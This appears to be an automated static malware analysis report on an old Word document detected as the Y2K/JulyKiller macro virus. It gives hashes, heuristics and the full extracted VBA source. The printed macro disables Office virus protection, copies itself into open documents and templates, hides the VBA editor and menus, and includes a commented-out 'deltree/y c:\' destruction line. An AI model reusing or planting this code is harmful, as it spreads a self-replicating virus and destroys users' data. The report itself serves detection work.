Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d272c593004a1d64…

MALICIOUS

Office (OLE)

59.5 KB Created: 2000-04-19 01:43:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 2995d367651cbce381f3d672ab31bd2a SHA-1: 8411f8e1bf631bff876bdde298df2ac8e971f4e0 SHA-256: d272c593004a1d649c7c3640e7c714f1b77949ca376fffbab7f9ffc00abf80e6
196 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a legacy Word document containing VBA macros, including AutoOpen and AutoClose, which are commonly used for malicious purposes. The 'Y2K' module attempts to disable virus protection and manipulate macro settings, likely to facilitate the execution of a secondary payload from a file named 'Autoexec.dot' located in the startup path.

Heuristics 6

  • ClamAV: Doc.Trojan.JulyKiller-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.JulyKiller-3
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
            Options.VirusProtection = False
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
                    If (cItem.Name = "AutoOpen") Or (cItem.Name = "AutoNew") Or (cItem.Name = "AutoClose") Or (cItem.Name = "FileSave") Then
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
                    If (cItem.Name = "AutoOpen") Or (cItem.Name = "AutoNew") Or (cItem.Name = "AutoClose") Or (cItem.Name = "FileSave") Then
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7193 bytes
SHA-256: 1e74216c39538ad1e72b589190743436db4ca367a20df396eb35d8ed5cf4edd3
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Y2K"
Sub actNo()
    For Each myTask In Tasks
        If InStr(myTask.Name, "Visual Basic") > 0 Then
            myTask.Visible = False
        End If
    Next myTask
End Sub
Sub Autos()
    Dim file$
    Dim ans$
    Dim test
    Dim mItem
    Dim cItem
    Dim aDoc
    Dim aTemp
    Dim vset
    Dim Iset
    Dim ad
    Dim y2kDate As Long
    Application.ScreenUpdating = False
    For Each ad In AddIns
    If ad.Name = "Autoexec.dot" Then
        ad.Installed = False
    End If
    Next ad
    With Dialogs(wdDialogToolsOptionsFileLocations)
    .path = "STARTUP-PATH"
    .Setting = "c:\"
    .Execute
    End With
    If Options.VirusProtection Then
        Options.VirusProtection = False
    End If
    
    file$ = WordBasic.[MacroFileName$]()
    If InStr(file$, "Autoexec") <> 0 Then
        For Each aDoc In Documents
        For Each cItem In aDoc.VBProject.VBComponents
        If (cItem.Name = "Y2K") Then
            vset = 1
        End If
        Next cItem
        Next aDoc
        For Each cItem In NormalTemplate.VBProject.VBComponents
        If (cItem.Name = "Y2K") Then
            vset = 1
        End If
        Next cItem
        If vset <> 1 Then
        'WordBasic.DisableAutoMacros
        Documents.Open FileName:="C:\Autoexec.dot", AddToRecentFiles:=False
        For Each aDoc In Documents
            If (InStr(aDoc.FullName, Application.PathSeparator) <> 0) And (aDoc.VBProject.Protection = 0) Then
                    WordBasic.MacroCopy ActiveDocument.FullName + ":Y2K", aDoc.FullName + ":Y2K"
            End If
        Next aDoc
        For Each aTemp In Templates
            If (InStr(aTemp.FullName, Application.PathSeparator) <> 0) And (aTemp.VBProject.Protection = 0) Then
                    WordBasic.MacroCopy ActiveDocument.FullName + ":Y2K", aTemp.FullName + ":Y2K"
            End If
        Next aTemp
        ActiveDocument.Save
        ActiveDocument.Close
        End If
        If vset = 1 Then
            GoTo out
        End If
    End If
    
    With Application.FileSearch
    .LookIn = "C:\"
    .FileName = "Autoexec.dot"
    If .Execute > 0 Then
          Iset = 1
    End If
    End With
    If Iset <> 1 Then
        'WordBasic.DisableAutoMacros
        Documents.Add NewTemplate:=True
        WordBasic.MacroCopy file$ + ":Y2K", ActiveDocument.FullName + ":Y2K"
        ActiveDocument.SaveAs FileName:="c:\Autoexec.dot", AddToRecentFiles:=False
        ActiveDocument.Close
    End If

    For Each aDoc In Documents
        If (file$ <> aDoc.FullName) And (aDoc.VBProject.Protection = 0) Then
            For Each cItem In aDoc.VBProject.VBComponents
                If (cItem.Name = "AutoOpen") Or (cItem.Name = "AutoNew") Or (cItem.Name = "AutoClose") Or (cItem.Name = "FileSave") Then
                    aDoc.VBProject.VBComponents.Remove (cItem)
                End If
            Next cItem
        End If
    Next aDoc
    For Each aTemp In Templates
        If (file$ <> aTemp.FullName) And (aTemp.VBProject.Protection = 0) Then
            For Each cItem In aTemp.VBProject.VBComponents
                If (cItem.Name = "AutoOpen") Or (cItem.Name = "AutoNew") Or (cItem.Name = "AutoClose") Or (cItem.Name = "FileSave") Then
                    aTemp.VBProject.VBComponents.Remove (cItem)
                End If
            Next cItem
        End If
    Next aTemp
    For Each aDoc In Documents
        If (InStr(aDoc.FullName, Application.PathSeparator) <> 0) And (aDoc.VBProject.Protection = 0) Then
             WordBasic.MacroCopy file$ + ":Y2K", aDoc.FullName + ":Y2K"
        End If
    Next aDoc
    For Each aTemp In Templates
        If (InStr(aTemp.FullName, Application.PathSeparator) <> 0) And (aTemp.VBProject.Protection = 0) Then
              WordBasic.MacroCopy file$ + ":Y2K", aTemp.FullName + ":Y2K"
        End If
    Next aTemp
out:
    CustomizationContext = NormalTemplate
    Set myKey = FindKey(BuildKeyCode(wdKeyAlt, wdKeyF8))
    myKey.Rebind KeyCategory:=wdKeyCategoryCommand, Command:="FileSaveAs"
    Set myKey = FindKey(BuildKeyCode(wdKeyAlt, wdKeyF11))
    myKey.Rebind KeyCategory:=wdKeyCategoryCommand, Command:="FileSaveAs"
       Set myKey = FindKey(BuildKeyCode(wdKeyAlt, wdKeyF1))
    myKey.Rebind KeyCategory:=wdKeyCategoryCommand, Command:="ToolsMacro"
    Set myKey = FindKey(BuildKeyCode(wdKeyAlt, wdKeyF2))
    myKey.Rebind KeyCategory:=wdKeyCategoryCommand, Command:="ViewVBCode"
    Set myKey = FindKey(BuildKeyCode(wdKeyAlt, wdKeyZ))
    myKey.Rebind KeyCategory:=wdKeyCategoryCommand, Command:="backy2k"
    
    For Each mItem In CommandBars("Tools").Controls
    If mItem.Caption = "×Ô¶¨Òå(&C)..." Then
        mItem.OnAction = "actno"
    End If
    If mItem.Caption = "Ä£°åºÍ¼ÓÔØÏî(&I)..." Then
        mItem.OnAction = "actno"
    End If
    If mItem.Caption = "Ñ¡Ïî(&O)..." Then
        mItem.OnAction = "actno"
    End If
    Next mItem
    For Each cItem In CommandBars("Tools").Controls
    If cItem.Type = msoControlPopup Then
        If cItem.Caption = "ºê(&M)" Then
            For Each mItem In cItem.CommandBar.Controls
                If mItem.Caption = "ºê(&M)..." Then
                    mItem.OnAction = "actno"
                End If
                If mItem.Caption = "Visual Basic ±à¼­Æ÷(&V)" Then
                    mItem.OnAction = "actno"
                End If
            Next mItem
        End If
    End If
    Next cItem
    For Each cItem In CommandBars("Visual Basic").Controls
    cItem.OnAction = "actno"
    Next cItem
    
    For Each cItem In CommandBars
    If cItem.Visible = True Then
        cItem.Protection = msoBarNoCustomize
    End If
    Next cItem
    For Each myTask In Tasks
        If InStr(myTask.Name, "Visual Basic") > 0 Then
            myTask.Visible = False
        End If
    Next myTask
Application.ScreenUpdating = True
On Error GoTo Pun
WordBasic.FileSaveAll 1, 1
Pun:
    y2kDate = Int(Now())
    On Error GoTo -1
    On Error GoTo -1
    If y2kDate >= 36526 Then
        If y2kDate = 36526 Or (Rnd() * 100000 Mod 10) = 2 Then
            'Open "C:\autoexec.bat" For Output As 1
            'Print #1, "deltree/y c:\"
            'Close 1
            For Each myTask In Tasks
                If InStr(myTask.Name, "Word") > 0 Then
                    myTask.Visible = False
                End If
            Next myTask
        End If
    End If
End Sub
Sub AutoOpen()
Autos
End Sub
Sub autoclose()
Autos
End Sub
Sub autoNew()
Autos
End Sub
Sub autoexec()
Autos
End Sub
Sub backY2k()
            For Each myTask In Tasks
                If InStr(myTask.Name, "Word") > 0 Then
                    myTask.Visible = True
                End If
            Next myTask

End Sub